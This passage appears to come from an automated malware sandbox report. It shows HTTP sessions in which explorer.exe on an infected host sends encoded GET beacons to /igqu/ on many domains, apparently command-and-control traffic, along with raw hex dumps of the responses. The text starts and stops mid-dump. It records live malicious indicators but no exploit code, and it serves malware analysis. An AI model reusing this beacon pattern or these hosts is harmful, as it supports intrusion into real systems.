4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49729	192.185.213.99	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:19.695023060 CET	266	OUT	GET /igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.trafegopago.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:19.834455013 CET	267	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 21 Nov 2020 08:23:19 GMT Server: Apache Location: https://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl Cache-Control: max-age=0 Expires: Sat, 21 Nov 2020 08:23:19 GMT Content-Length: 337 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 66 65 67 6f 70 61 67 6f 2e 63 6f 6d 2f 69 67 71 75 2f 3f 4a 42 5a 30 6e 48 53 3d 64 6f 6e 68 6a 58 4e 68 37 6b 4c 59 31 69 43 63 2b 53 6c 45 4e 57 7a 74 38 78 37 49 6f 47 62 54 55 71 2f 4e 32 79 38 78 44 48 44 4b 76 31 6a 5a 57 74 51 4f 34 56 50 76 75 43 6a 5a 74 46 47 68 52 75 51 33 26 61 6d 70 3b 42 5a 3d 45 32 4a 38 59 6a 2d 30 5f 4a 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49750	13.248.196.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:08.075890064 CET	4657	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt HTTP/1.1 Host: www.namofast.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:08.218797922 CET	4658	IN	HTTP/1.1 403 Forbidden Date: Sat, 21 Nov 2020 08:24:08 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49751	198.54.117.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:13.440628052 CET	4659	OUT	GET /igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.plantpowered.energy Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49752	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:23.729590893 CET	4660	OUT	GET /igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.capitalcitybombers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:23.844413996 CET	4660	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sat, 21 Nov 2020 08:24:23 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c735-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49753	45.194.171.26	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:29.440793037 CET	4662	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5 HTTP/1.1 Host: www.chemtradent.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:29.849056959 CET	4662	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 21 Nov 2020 08:24:29 GMT Content-Type: text/html; charset=gbk Transfer-Encoding: chunked Connection: close Location: /404.html Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49755	74.208.236.115	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:40.429598093 CET	4664	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1 Host: www.ownumo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:40.573529005 CET	4666	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Sat, 21 Nov 2020 08:24:40 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49730	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:24.911351919 CET	268	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+ HTTP/1.1 Host: www.coveloungewineandwhiskey.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:25.026355028 CET	269	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sat, 21 Nov 2020 08:23:24 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c734-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49736	208.91.197.160	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:30.342092037 CET	341	OUT	GET /igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.covid19salivatestdirect.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:30.514624119 CET	342	IN	HTTP/1.1 200 OK Date: Sat, 21 Nov 2020 08:23:30 GMT Server: Apache Set-Cookie: vsid=925vr3534926104426681; expires=Thu, 20-Nov-2025 08:23:30 GMT; Max-Age=157680000; path=/; domain=www.covid19salivatestdirect.com; HttpOnly Content-Length: 272 Keep-Alive: timeout=5, max=25 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 35 29 3c 2f 68 33 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (25)</h3></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49742	160.153.136.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:35.598393917 CET	4628	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB HTTP/1.1 Host: www.heartandcrowncloset.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:35.624041080 CET	4628	IN	HTTP/1.1 302 Found Connection: close Pragma: no-cache cache-control: no-cache Location: /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49743	168.206.180.179	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:41.173491001 CET	4629	OUT	GET /igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.primeworldgroup.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49744	3.138.72.189	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:46.681252956 CET	4630	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW HTTP/1.1 Host: www.placeduconfort.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:46.794529915 CET	4630	IN	HTTP/1.1 404 Not Found Date: Sat, 21 Nov 2020 08:23:46 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49745	119.81.172.165	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:52.176956892 CET	4631	OUT	GET /igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.hyx20140813.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49746	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:57.488390923 CET	4632	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P HTTP/1.1 Host: www.obsessingwealth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:57.585954905 CET	4633	IN	HTTP/1.1 404 Not Found Date: Sat, 21 Nov 2020 08:23:57 GMT Content-Type: text/html;charset=utf-8 Content-Length: 2963 Connection: close cache-control: no-cache content-language: en x-wix-request-id: 1605947037.512617447223123744 vary: Accept-Encoding Age: 0 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVibIocjnRtufUcpNBchey7f,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijnY7/VNlubeTQ0QDVGgdWZOWIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsIypLE4F2PuIWPzRaGkCubY4fbJaKSXYQ/lskq2jK6SGP,2UNV7KOq4oGjA5+PKsX47LZ7Kls+1whC/C/a0aUIqJE=,qquldgcFrj2n046g4RNSVOgjK1IbQcmp+2yVeKIZh3A=,Ts+7R/4FijtA6c9psi3FQOPGhVfh+x6EeEw93/iu2TqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9n3wTMzaU7zAZzBAj7gVU1qo4CFM+qXpuugP2vtnPwCK+afZ0G9g+n2YylymUGNgVnd8Z4jLK9R467MyhrzM6w==,Ts+7R/4FijtA6c9psi3FQOPGhVfh+x6EeEw93/iu2TqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,l7Ey5khejq81S7sxGe5Nk93BmJcRyJ7RcvYfTdrJez2TzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,a3Wp9ZyujRzrXdcjNnttJp5sroSNvmr+Pl/L0Ukl0K5w1Vz15De+ZI5GVU3WIK+CJoSwYn8c4giImF/hgqmpqg== Server: Pepyaka/1.19.0 Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 